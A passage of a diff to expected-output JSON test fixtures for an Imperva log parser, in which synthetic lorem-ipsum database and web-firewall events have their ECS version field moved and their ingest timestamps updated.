04:35:42,srvGroup=avol,service=icero,appName=xer,event#=emipsumd,eventType=Logout,usrGroup=isisten,usrAuth=False,application=\"cusant\",osUsername=atemq,srcHost=rinre2977.api.corp,dbName=totamre,schemaName=isnostr,bindVar=umqu,sqlError=success,respSize=6135,respTime=86.668000,affRows=inesci,action=\"accept\",rawQuery=\"uia\"", "event": { - "ingested": "2021-06-09T11:17:04.825799600Z" + "ingested": "2021-12-14T14:46:55.618549462Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.49.167.57,dstPort=2119,dbUsername=tali,srcIP=10.41.21.204,srcPort=3540,creatTime=4 July 2016 11:38:16,srvGroup=rpori,service=ice,appName=oles,event#=edic,eventType=Login,usrGroup=seq,usrAuth=True,application=\"tutlab\",osUsername=sau,srcHost=atevelit2450.local,dbName=aperia,schemaName=ccaeca,bindVar=umdolo,sqlError=failure,respSize=6818,respTime=115.224000,affRows=stenatu,action=\"block\",rawQuery=\"orumSe\"", "event": { - "ingested": "2021-06-09T11:17:04.825804400Z" + "ingested": "2021-12-14T14:46:55.618550091Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=dutp,event#=psaquaea,createTime=2016-07-18 18:40:50,updateTime=taevita,alertSev=high,group=siut,ruleName=\"tconsect\",evntDesc=\"aquae\",category=boreetdo,disposition=aturve,eventType=ditemp,proto=ipv6,srcPort=3406,srcIP=10.216.125.252,dstPort=5592,dstIP=10.62.147.186,policyName=\"eumiure\",occurrences=4603,httpHost=ima,webMethod=quasia,url=\"https://example.org/umwrit/uptate.html?ctetura=aveni#elit\",webQuery=\"seosqui\",soapAction=sequamni,resultCode=uradi,sessionID=tot,username=llamco,addUsername=nea,responseTime=psum,responseSize=tasnulap,direction=inbound,dbUsername=umSe,queryGroup=xeacomm,application=\"cinge\",srcHost=itla658.api.localhost,osUsername=lorsita,schemaName=dolore,dbName=uptate,hdrName=quidexea,action=\"accept\",errormsg=\"unknown\"", "event": { - "ingested": "2021-06-09T11:17:04.825809200Z" + "ingested": "2021-12-14T14:46:55.618550483Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=ate,event#=odoconse,createTime=2016-08-02 01:43:25,updateTime=emp,alertSev=very-high,group=veli,ruleName=\"tenim\",evntDesc=\"rumet\",category=verita,disposition=sectet,eventType=etdo,proto=tcp,srcPort=3689,srcIP=10.52.125.9,dstPort=2538,dstIP=10.204.128.215,policyName=\"ama\",occurrences=332,httpHost=runtmol,webMethod=texpli,url=\"https://api.example.org/roidents/tem.txt?tametcon=liqua#mvele\",webQuery=\"isis\",soapAction=uasiar,resultCode=utlab,sessionID=emUteni,username=rum,addUsername=gnaaliqu,responseTime=teirured,responseSize=onemulla,direction=external,dbUsername=bor,queryGroup=rauto,application=\"ationev\",srcHost=umdolor4389.api.home,osUsername=paquioff,schemaName=nci,dbName=isau,hdrName=rautodi,action=deny", "event": { - "ingested": "2021-06-09T11:17:04.825813800Z" + "ingested": "2021-12-14T14:46:55.618550877Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.200.68.129,dstPort=2558,dbUsername=icabo,srcIP=10.34.148.166,srcPort=3022,creatTime=2016-08-16 08:45:59,srvGroup=preh,service=ercit,appName=etMal,event#=qua,eventType=rsita,usrGroup=ate,usrAuth=ipsamvo,application=\"onula\",osUsername=miu,srcHost=rationev6444.localhost,dbName=tatem,schemaName=untutlab,bindVar=amcor,sqlError=failure,respSize=5427,respTime=176.685000,affRows=oremq,action=\"block\",rawQuery=\"uisaute\"", "event": { - "ingested": "2021-06-09T11:17:04.825818400Z" + "ingested": "2021-12-14T14:46:55.618551281Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.226.101.180,dstPort=1000,dbUsername=siu,srcIP=10.134.5.40,srcPort=7284,creatTime=30 August 2016 15:48:33,srvGroup=llamc,service=nte,appName=mvel,event#=nof,eventType=Login,usrGroup=usmodi,usrAuth=False,application=\"mvolu\",osUsername=conse,srcHost=ipi7727.www5.domain,dbName=isiu,schemaName=licabo,bindVar=enimadmi,sqlError=success,respSize=6356,respTime=41.238000,affRows=xeaco,action=\"deny\",rawQuery=\"amcor\"", "event": { - "ingested": "2021-06-09T11:17:04.825822800Z" + "ingested": "2021-12-14T14:46:55.618551671Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.126.26.131,dstPort=2595,dbUsername=velite,srcIP=10.30.98.10,srcPort=7576,creatTime=13 September 2016 22:51:07,srvGroup=itation,service=sequatD,appName=nimave,event#=isciv,eventType=Login,usrGroup=rroqu,usrAuth=False,application=\"nofd\",osUsername=dipisci,srcHost=spernatu5539.domain,dbName=quunt,schemaName=olori,bindVar=mquae,sqlError=unknown,respSize=7717,respTime=96.729000,affRows=cidunt,action=\"accept\",rawQuery=\"borisnis\"", "event": { - "ingested": "2021-06-09T11:17:04.825827500Z" + "ingested": "2021-12-14T14:46:55.618552255Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.190.10.219,dstPort=5530,dbUsername=accusant,srcIP=10.233.120.207,srcPort=136,creatTime=2016-09-28 05:53:42,srvGroup=stenatu,service=inibu,appName=est,event#=uptatemU,eventType=Logout,usrGroup=leumiu,usrAuth=False,application=\"tla\",osUsername=item,srcHost=nimid372.api.corp,dbName=atcupid,schemaName=quamnih,bindVar=dminima,sqlError=success,respSize=3278,respTime=60.949000,affRows=tame,action=\"cancel\",rawQuery=\"reetd\"", "event": { - "ingested": "2021-06-09T11:17:04.825832100Z" + "ingested": "2021-12-14T14:46:55.618552643Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=sitam,createTime=2016-10-12 12:56:16,eventType=rad,eventSev=low,username=sequa,subsystem=iosamnis,message=\"volupt\"", "event": { - "ingested": "2021-06-09T11:17:04.825837Z" + "ingested": "2021-12-14T14:46:55.618553063Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.100.98.56,dstPort=1089,dbUsername=boru,srcIP=10.248.184.200,srcPort=5315,creatTime=2016-10-26 19:58:50,srvGroup=ptatem,service=ptatevel,appName=tenatuse,event#=psaqua,eventType=Logout,usrGroup=ullamcor,usrAuth=False,application=\"itationu\",osUsername=proident,srcHost=maliquam2147.internal.home,dbName=lores,schemaName=ritati,bindVar=orisni,sqlError=failure,respSize=5923,respTime=179.541000,affRows=sitam,action=\"deny\",rawQuery=\"mmodoc\"", "event": { - "ingested": "2021-06-09T11:17:04.825841700Z" + "ingested": "2021-12-14T14:46:55.618553488Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.197.6.245,dstPort=27,dbUsername=dtempo,srcIP=10.82.28.220,srcPort=3570,creatTime=10 November 2016 03:01:24,srvGroup=imad,service=tinvolup,appName=tsed,event#=inv,eventType=Login,usrGroup=rroq,usrAuth=False,application=\"rcit\",osUsername=aecatcup,srcHost=olabor2983.internal.localhost,dbName=citatio,schemaName=oluptat,bindVar=mveniamq,sqlError=success,respSize=3071,respTime=120.142000,affRows=eaqueips,action=\"allow\",rawQuery=\"aturve\"", "event": { - "ingested": "2021-06-09T11:17:04.825846900Z" + "ingested": "2021-12-14T14:46:55.618553938Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.6.27.103,dstPort=3179,dbUsername=redol,srcIP=10.167.252.183,srcPort=2003,creatTime=24 November 2016 10:03:59,srvGroup=doei,service=cipitl,appName=caboNemo,event#=dexerc,eventType=Login,usrGroup=strumex,usrAuth=True,application=\"eprehend\",osUsername=asnu,srcHost=hitec2111.mail.corp,dbName=perspici,schemaName=ationul,bindVar=mquisn,sqlError=failure,respSize=6606,respTime=155.907000,affRows=emUte,action=\"cancel\",rawQuery=\"ccae\"", "event": { - "ingested": "2021-06-09T11:17:04.825852100Z" + "ingested": "2021-12-14T14:46:55.618554324Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=ntNe,event#=itanim,createTime=2016-12-08 17:06:33,updateTime=nesciun,alertSev=medium,group=mollita,ruleName=\"tatem\",evntDesc=\"iae\",category=quido,disposition=emip,eventType=inBC,proto=tcp,srcPort=6165,srcIP=10.88.45.111,dstPort=6735,dstIP=10.81.184.7,policyName=\"saquaea\",occurrences=6344,httpHost=eetd,webMethod=illu,url=\"https://mail.example.com/lorsi/repreh.gif?sitamet=utlabo#tetur\",webQuery=\"tionula\",soapAction=ritqu,resultCode=ecatcupi,sessionID=uamei,username=undeomni,addUsername=tas,responseTime=autfugi,responseSize=tasun,direction=external,dbUsername=eratv,queryGroup=ipsa,application=\"asuntexp\",srcHost=adminim2559.www5.invalid,osUsername=lmole,schemaName=iameaque,dbName=nderi,hdrName=ssusci,action=\"deny\",errormsg=\"failure\"", "event": { - "ingested": "2021-06-09T11:17:04.825863700Z" + "ingested": "2021-12-14T14:46:55.618554711Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.214.3.140,dstPort=6127,dbUsername=scipitl,srcIP=10.29.119.245,srcPort=1179,creatTime=2016-12-23 00:09:07,srvGroup=olli,service=rever,appName=ore,event#=offici,eventType=Logout,usrGroup=ection,usrAuth=False,application=\"roquisqu\",osUsername=edolorin,srcHost=dolorem6882.api.local,dbName=rsi,schemaName=taliqui,bindVar=mides,sqlError=success,respSize=5140,respTime=119.229000,affRows=tcu,action=\"cancel\",rawQuery=\"inrepreh\"", "event": { - "ingested": "2021-06-09T11:17:04.825869Z" + "ingested": "2021-12-14T14:46:55.618555206Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=dipiscin,event#=olup,createTime=2017-01-06 07:11:41,updateTime=aco,alertSev=medium,group=accusa,ruleName=\"natu\",evntDesc=\"liquid\",category=enim,disposition=Finibus,eventType=radi,proto=rdp,srcPort=2064,srcIP=10.218.123.234,dstPort=57,dstIP=10.110.133.7,policyName=\"radipisc\",occurrences=5347,httpHost=nibus,webMethod=vitaed,url=\"https://example.org/etconsec/elillum.htm?mporinc=onsectet#idolo\",webQuery=\"atemUte\",soapAction=docon,resultCode=mdolore,sessionID=eosquira,username=pta,addUsername=snos,responseTime=orsi,responseSize=tetura,direction=external,dbUsername=lorsita,queryGroup=eavol,application=\"osamnis\",srcHost=temaccu5302.test,osUsername=etconsec,schemaName=caboNem,dbName=urExcept,hdrName=rumetMal,action=\"allow\",errormsg=\"unknown\"", "event": { - "ingested": "2021-06-09T11:17:04.825873700Z" + "ingested": "2021-12-14T14:46:55.618555599Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.105.190.170,dstPort=2519,dbUsername=doeiu,srcIP=10.182.152.242,srcPort=1877,creatTime=2017-01-20 14:14:16,srvGroup=orumw,service=redol,appName=ecillum,event#=isci,eventType=Logout,usrGroup=dolor,usrAuth=True,application=\"tiumto\",osUsername=litan,srcHost=nder347.www.corp,dbName=alorum,schemaName=mquisn,bindVar=atq,sqlError=unknown,respSize=3474,respTime=68.556000,affRows=ugiatquo,action=\"block\",rawQuery=\"equamnih\"", "event": { - "ingested": "2021-06-09T11:17:04.825878100Z" + "ingested": "2021-12-14T14:46:55.618556001Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=citati,event#=uamei,createTime=2017-02-03 21:16:50,updateTime=eursinto,alertSev=low,group=tutla,ruleName=\"licaboNe\",evntDesc=\"tautfug\",category=giatquov,disposition=olu,eventType=rmagnido,proto=ipv6-icmp,srcPort=7647,srcIP=10.59.188.188,dstPort=7082,dstIP=10.123.166.197,policyName=\"ici\",occurrences=7102,httpHost=mips,webMethod=itae,url=\"https://internal.example.net/atnula/ditautf.jpg?iquidex=olup#remipsu\",webQuery=\"tan\",soapAction=quiac,resultCode=sunt,sessionID=autfugit,username=emUte,addUsername=iusmodi,responseTime=fdeFi,responseSize=Except,direction=inbound,dbUsername=equat,queryGroup=aliquid,application=\"usantiu\",srcHost=idunt4633.internal.host,osUsername=liquam,schemaName=min,dbName=oluptat,hdrName=odt,action=block", "event": { - "ingested": "2021-06-09T11:17:04.825882800Z" + "ingested": "2021-12-14T14:46:55.618556402Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.72.75.207,dstPort=6336,dbUsername=urau,srcIP=10.201.168.116,srcPort=2037,creatTime=2017-02-18 04:19:24,srvGroup=utali,service=sed,appName=xeac,event#=umdolors,eventType=Logout,usrGroup=lumdo,usrAuth=False,application=\"acom\",osUsername=eFini,srcHost=ectob4634.mail.localhost,dbName=prehend,schemaName=eufug,bindVar=roquisq,sqlError=unknown,respSize=3348,respTime=79.765000,affRows=civelits,action=\"accept\",rawQuery=\"reet\"", "event": { - "ingested": "2021-06-09T11:17:04.825887300Z" + "ingested": "2021-12-14T14:46:55.618556787Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.9.46.123,dstPort=586,dbUsername=mfu,srcIP=10.58.133.175,srcPort=1634,creatTime=4 March 2017 11:21:59,srvGroup=llumq,service=tenim,appName=eiusmo,event#=ainc,eventType=Login,usrGroup=miurerep,usrAuth=True,application=\"lestia\",osUsername=nde,srcHost=snu6436.www.local,dbName=texplica,schemaName=oco,bindVar=aboree,sqlError=unknown,respSize=3795,respTime=14.713000,affRows=edquian,action=\"block\",rawQuery=\"uames\"", "event": { - "ingested": "2021-06-09T11:17:04.825891900Z" + "ingested": "2021-12-14T14:46:55.618557168Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.169.50.59,dstPort=7693,dbUsername=pta,srcIP=10.70.29.203,srcPort=5994,creatTime=18 March 2017 18:24:33,srvGroup=piciatis,service=destla,appName=fugitse,event#=minimve,eventType=Login,usrGroup=serrorsi,usrAuth=False,application=\"tametco\",osUsername=mquisnos,srcHost=lore7099.www.host,dbName=isn,schemaName=veniamq,bindVar=lup,sqlError=unknown,respSize=2358,respTime=94.460000,affRows=ipitlabo,action=\"block\",rawQuery=\"prehen\"", "event": { - "ingested": "2021-06-09T11:17:04.825896900Z" + "ingested": "2021-12-14T14:46:55.618557569Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.165.182.111,dstPort=5525,dbUsername=ames,srcIP=10.137.85.123,srcPort=218,creatTime=2017-04-02 01:27:07,srvGroup=amquisno,service=modoc,appName=magnam,event#=uinesc,eventType=Logout,usrGroup=cid,usrAuth=True,application=\"emi\",osUsername=Bonorum,srcHost=lesti6939.api.local,dbName=idu,schemaName=sis,bindVar=idolo,sqlError=success,respSize=6401,respTime=171.434000,affRows=its,action=\"block\",rawQuery=\"edutp\"", "event": { - "ingested": "2021-06-09T11:17:04.825901Z" + "ingested": "2021-12-14T14:46:55.618558060Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=enimadmi,createTime=2017-04-16 08:29:41,eventType=tateveli,eventSev=high,username=sumdolo,subsystem=idolorem,message=\"temvele\"", "event": { - "ingested": "2021-06-09T11:17:04.825905Z" + "ingested": "2021-12-14T14:46:55.618558442Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=inimve,event#=uio,createTime=2017-04-30 15:32:16,updateTime=mexercit,alertSev=high,group=onofdeF,ruleName=\"ibusBo\",evntDesc=\"orin\",category=enia,disposition=iavol,eventType=natuserr,proto=rdp,srcPort=3327,srcIP=10.64.184.196,dstPort=6659,dstIP=10.173.178.109,policyName=\"tatemse\",occurrences=4493,httpHost=amqui,webMethod=lamco,url=\"https://www.example.net/hender/ptatemU.htm?mquisnos=tnulapa#madmi\",webQuery=\"tlabore\",soapAction=idunt,resultCode=expl,sessionID=olore,username=uian,addUsername=atuserro,responseTime=madminim,responseSize=tobeata,direction=inbound,dbUsername=ioff,queryGroup=oinBCS,application=\"itsedd\",srcHost=upt6017.api.localdomain,osUsername=nesci,schemaName=tam,dbName=sin,hdrName=idexeac,action=\"block\",errormsg=\"failure\"", "event": { - "ingested": "2021-06-09T11:17:04.825909400Z" + "ingested": "2021-12-14T14:46:55.618558835Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.90.50.149,dstPort=1936,dbUsername=olu,srcIP=10.168.225.209,srcPort=6,creatTime=2017-05-14 22:34:50,srvGroup=taliq,service=tautfugi,appName=fdeFinib,event#=uip,eventType=Logout,usrGroup=ectobea,usrAuth=True,application=\"dat\",osUsername=aUtenima,srcHost=turQuis4046.api.test,dbName=deomnisi,schemaName=olupta,bindVar=oll,sqlError=success,respSize=1127,respTime=55.870000,affRows=evelite,action=\"block\",rawQuery=\"iav\"", "event": { - "ingested": "2021-06-09T11:17:04.825913400Z" + "ingested": "2021-12-14T14:46:55.618559230Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.59.182.36,dstPort=5792,dbUsername=mtota,srcIP=10.18.150.82,srcPort=6648,creatTime=29 May 2017 05:37:24,srvGroup=rit,service=eumfu,appName=lors,event#=oluptat,eventType=Login,usrGroup=enimad,usrAuth=True,application=\"tis\",osUsername=qua,srcHost=con6049.internal.lan,dbName=quelaud,schemaName=luptat,bindVar=rinrep,sqlError=unknown,respSize=6112,respTime=135.357000,affRows=nimv,action=\"allow\",rawQuery=\"tconse\"", "event": { - "ingested": "2021-06-09T11:17:04.825917600Z" + "ingested": "2021-12-14T14:46:55.618559719Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=rem,createTime=2017-06-12 12:39:58,eventType=ulamcola,eventSev=very-high,username=llita,subsystem=ntsunt,message=\"nturmag\"", "event": { - "ingested": "2021-06-09T11:17:04.825923700Z" + "ingested": "2021-12-14T14:46:55.618560197Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.228.229.144,dstPort=3236,dbUsername=ametcons,srcIP=10.151.240.35,srcPort=3197,creatTime=2017-06-26 19:42:33,srvGroup=roquisq,service=uasi,appName=maveniam,event#=uis,eventType=lill,usrGroup=remeum,usrAuth=mmod,application=\"taevit\",osUsername=ama,srcHost=tatnonp1371.www.invalid,dbName=xercit,schemaName=lam,bindVar=asnu,sqlError=failure,respSize=4325,respTime=168.492000,affRows=eriam,action=\"cancel\",rawQuery=\"aquae\"", "event": { - "ingested": "2021-06-09T11:17:04.825927700Z" + "ingested": "2021-12-14T14:46:55.618560586Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.242.48.203,dstPort=1102,dbUsername=ese,srcIP=10.147.142.242,srcPort=2586,creatTime=2017-07-11 02:45:07,srvGroup=eca,service=ctionofd,appName=mpori,event#=olupt,eventType=Logout,usrGroup=ola,usrAuth=False,application=\"ptat\",osUsername=quasi,srcHost=tium3542.internal.invalid,dbName=squamest,schemaName=quisn,bindVar=pteu,sqlError=success,respSize=3970,respTime=11.548000,affRows=antium,action=\"block\",rawQuery=\"velillum\"", "event": { - "ingested": "2021-06-09T11:17:04.825931800Z" + "ingested": "2021-12-14T14:46:55.618560965Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=lapari,event#=Mal,createTime=2017-07-25 09:47:41,updateTime=itinvo,alertSev=very-high,group=paq,ruleName=\"emipsumq\",evntDesc=\"culpaq\",category=quamq,disposition=usan,eventType=tdolo,proto=ipv6,srcPort=4723,srcIP=10.213.165.165,dstPort=3787,dstIP=10.254.10.98,policyName=\"adipisc\",occurrences=7365,httpHost=tasnul,webMethod=uptasn,url=\"https://example.net/itati/oidentsu.gif?eporroqu=aturve#temqui\",webQuery=\"lup\",soapAction=aeca,resultCode=isau,sessionID=giat,username=ttenb,addUsername=eirure,responseTime=boreetd,responseSize=tNe,direction=outbound,dbUsername=eeufug,queryGroup=ntin,application=\"iades\",srcHost=radipis3991.mail.invalid,osUsername=civeli,schemaName=eufugia,dbName=utlabore,hdrName=tamr,action=\"cancel\",errormsg=\"success\"", "event": { - "ingested": "2021-06-09T11:17:04.825935700Z" + "ingested": "2021-12-14T14:46:55.618561348Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=onemul,createTime=2017-08-08 16:50:15,eventType=trudexe,eventSev=very-high,username=ura,subsystem=oreeufug,message=\"Quisa\"", "event": { - "ingested": "2021-06-09T11:17:04.825939400Z" + "ingested": "2021-12-14T14:46:55.618561801Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=llitani,event#=uscipit,createTime=2017-08-22 23:52:50,updateTime=luptat,alertSev=very-high,group=etco,ruleName=\"iuntN\",evntDesc=\"utfugi\",category=ursintoc,disposition=tio,eventType=mmodicon,proto=ipv6,srcPort=5439,srcIP=10.116.1.130,dstPort=3402,dstIP=10.169.28.157,policyName=\"exeacomm\",occurrences=1295,httpHost=ionula,webMethod=pexeaco,url=\"https://api.example.org/uamqua/Neq.gif?eumiu=nim#pteurs\",webQuery=\"ercitati\",soapAction=atem,resultCode=serro,sessionID=lumquid,username=eturadip,addUsername=amquaera,responseTime=rsitamet,responseSize=leumiur,direction=internal,dbUsername=utod,queryGroup=olesti,application=\"edquia\",srcHost=ihi7294.www5.localhost,osUsername=reseo,schemaName=amco,dbName=ons,hdrName=onsecte,action=\"accept\",errormsg=\"unknown\"", "event": { - "ingested": "2021-06-09T11:17:04.825943200Z" + "ingested": "2021-12-14T14:46:55.618562191Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.29.138.31,dstPort=5871,dbUsername=volupta,srcIP=10.45.69.152,srcPort=4083,creatTime=6 September 2017 06:55:24,srvGroup=emi,service=uaerat,appName=iduntu,event#=samvol,eventType=Login,usrGroup=equa,usrAuth=False,application=\"apari\",osUsername=tsunt,srcHost=caecat4920.api.host,dbName=enim,schemaName=umq,bindVar=sistena,sqlError=failure,respSize=744,respTime=33.416000,affRows=temquia,action=\"deny\",rawQuery=\"eumiu\"", "event": { - "ingested": "2021-06-09T11:17:04.825946900Z" + "ingested": "2021-12-14T14:46:55.618562575Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.152.213.228,dstPort=3387,dbUsername=ptatev,srcIP=10.100.113.11,srcPort=6971,creatTime=2017-09-20 13:57:58,srvGroup=aliqu,service=sequine,appName=utaliqui,event#=isciv,eventType=Logout,usrGroup=osqu,usrAuth=False,application=\"ptatemse\",osUsername=itationu,srcHost=setquas6188.internal.local,dbName=magnaali,schemaName=velillum,bindVar=ionev,sqlError=success,respSize=7245,respTime=131.118000,affRows=ameaq,action=\"cancel\",rawQuery=\"Except\"", "event": { - "ingested": "2021-06-09T11:17:04.825951100Z" + "ingested": "2021-12-14T14:46:55.618562967Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=uiac,createTime=2017-10-04 21:00:32,eventType=tquii,eventSev=low,username=reme,subsystem=emeumfu,message=\"inBCSedu\"", "event": { - "ingested": "2021-06-09T11:17:04.825954800Z" + "ingested": "2021-12-14T14:46:55.618563353Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.208.33.55,dstPort=1849,dbUsername=ulapari,srcIP=10.248.102.129,srcPort=3510,creatTime=2017-10-19 04:03:07,srvGroup=iatn,service=saquaeab,appName=eli,event#=rissusci,eventType=Logout,usrGroup=ectetur,usrAuth=True,application=\"dictasun\",osUsername=inimv,srcHost=nibusBo3674.www5.localhost,dbName=ntut,schemaName=mremaper,bindVar=uteirur,sqlError=unknown,respSize=6433,respTime=111.360000,affRows=isni,action=\"accept\",rawQuery=\"quovo\"", "event": { - "ingested": "2021-06-09T11:17:04.825958700Z" + "ingested": "2021-12-14T14:46:55.618563835Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.203.164.132,dstPort=6213,dbUsername=mporin,srcIP=10.109.230.216,srcPort=4447,creatTime=2017-11-02 11:05:41,srvGroup=uov,service=pariat,appName=icaboNe,event#=boreetd,eventType=Logout,usrGroup=uir,usrAuth=True,application=\"rumex\",osUsername=ectobea,srcHost=totamr7676.www5.home,dbName=imadm,schemaName=ibus,bindVar=lumdol,sqlError=success,respSize=547,respTime=166.971000,affRows=reprehe,action=\"block\",rawQuery=\"ihil\"", "event": { - "ingested": "2021-06-09T11:17:04.825962400Z" + "ingested": "2021-12-14T14:46:55.618564221Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.151.203.60,dstPort=482,dbUsername=dol,srcIP=10.117.81.75,srcPort=3365,creatTime=16 November 2017 18:08:15,srvGroup=iciatis,service=agn,appName=cul,event#=tate,eventType=Login,usrGroup=psam,usrAuth=True,application=\"itaedi\",osUsername=exeac,srcHost=idents7231.mail.home,dbName=veniamqu,schemaName=iconsequ,bindVar=ueporr,sqlError=unknown,respSize=484,respTime=27.563000,affRows=tur,action=\"block\",rawQuery=\"onorumet\"", "event": { - "ingested": "2021-06-09T11:17:04.825966400Z" + "ingested": "2021-12-14T14:46:55.618564605Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.224.217.153,dstPort=6339,dbUsername=eriti,srcIP=10.45.152.205,srcPort=6907,creatTime=1 December 2017 01:10:49,srvGroup=riame,service=datatn,appName=seq,event#=mquis,eventType=Login,usrGroup=tur,usrAuth=True,application=\"itation\",osUsername=utlabo,srcHost=tat50.mail.host,dbName=essequam,schemaName=imav,bindVar=mtot,sqlError=success,respSize=922,respTime=17.709000,affRows=prehend,action=\"allow\",rawQuery=\"liquid\"", "event": { - "ingested": "2021-06-09T11:17:04.825970200Z" + "ingested": "2021-12-14T14:46:55.618564993Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=umq,event#=ipsu,createTime=2017-12-15 